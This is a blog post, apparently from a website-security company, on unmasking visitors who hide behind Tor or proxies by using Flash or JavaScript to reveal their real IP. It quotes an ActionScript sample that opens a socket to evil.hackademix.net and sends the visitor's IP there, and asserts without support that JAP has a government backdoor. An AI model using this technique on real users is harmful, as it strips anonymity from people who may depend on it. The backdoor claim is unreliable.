• How to track down “anonymous-users”

    Staying anonymous on the Internet has been a much behooved ability for many different reasons. One group of malicious individuals, focusing on code-injection attacks on websites, often attempts to mask themselves by trying to use anonymizing proxies.

    These proxy servers should in theory cloak the identity of the individual using them. This is not widespread in practice. Why? because it is trivial to uncover the identity of an individual…read on.

    Often time surfers use networks such as Tor, JAP etc. to mask their activities. these networks and more importantly the users are not informed enough to stand up to the heat of a moderate forensic investigation.

    In case you didn’t know, JAP has a government installed backdoor:

    CAMsg::printMsg(LOG_INFO,"Loading Crime Detection Data....\n");
    CAMsg::printMsg(LOG_CRIT,"Crime detected - ID: %u - Content:\n%s\n",id,crimeBuff,payLen);
    

    If you think using Tor is safer, well the truth is, its not. This is not because the tor concept is flawed. Its because of the end-user not being savvy enough.

    As an example, a lot of code injection attacks are carried out via anonymous proxies or anonymizing networks, the perpatrators think that they can remain unnoticed. How can we track them down, its simple, leverage the power of Flash/Applets/JavaScript….

    Disclaimer: Elite proxies, relakks and the like and some special configurations which channel all communication via one end-point are obviously a little different.

    In my discussion with Matt Heaton, CEO of Bluehost at HostingCon this year, we touched on some of these points. It is critical for hosting companies in general to have a quick -reaction system in place which can identify code-injecion on sites, remove it and block the perpetrators and move forward to inform the site owners and fix the issue. StopTheHacker helps with identification, recovery and hardening of websites and Internet facing infrastructure and hence it is natural for us to explore how to provide a little more help to folks interested in tracking the “real IP” of individuals visiting their sites.

    The concept is trivial: use flash/applets/JavaScript to open up a connection to the final landing page! Yep, its that simple. The user may go through all the anonymizing proxies they like, if they do not have flash/js turned off, you can get the “real IP” and de-cloak the users.

    An action script example: from hackademix.net

    var socket = new XMLSocket();
    socket.onConnect = function(success) {
        socket.onXML = function(doc) {
            getURL("http://evil.hackademix.net/proxy_bypass?ip=" +
            doc.firstChild.firstChild.nodeValue);
            socket.close();
        };
        socket.send(new XML());
    };
    socket.connect("evil.hackademix.net", 9999);
    

    It is trivial to have a server listening at that port. So there we go, if you do not have flash/JavaScript turned off you can be tracked. All the website owner needs to do is throw the swf file at you.

    You can give no-script a try too.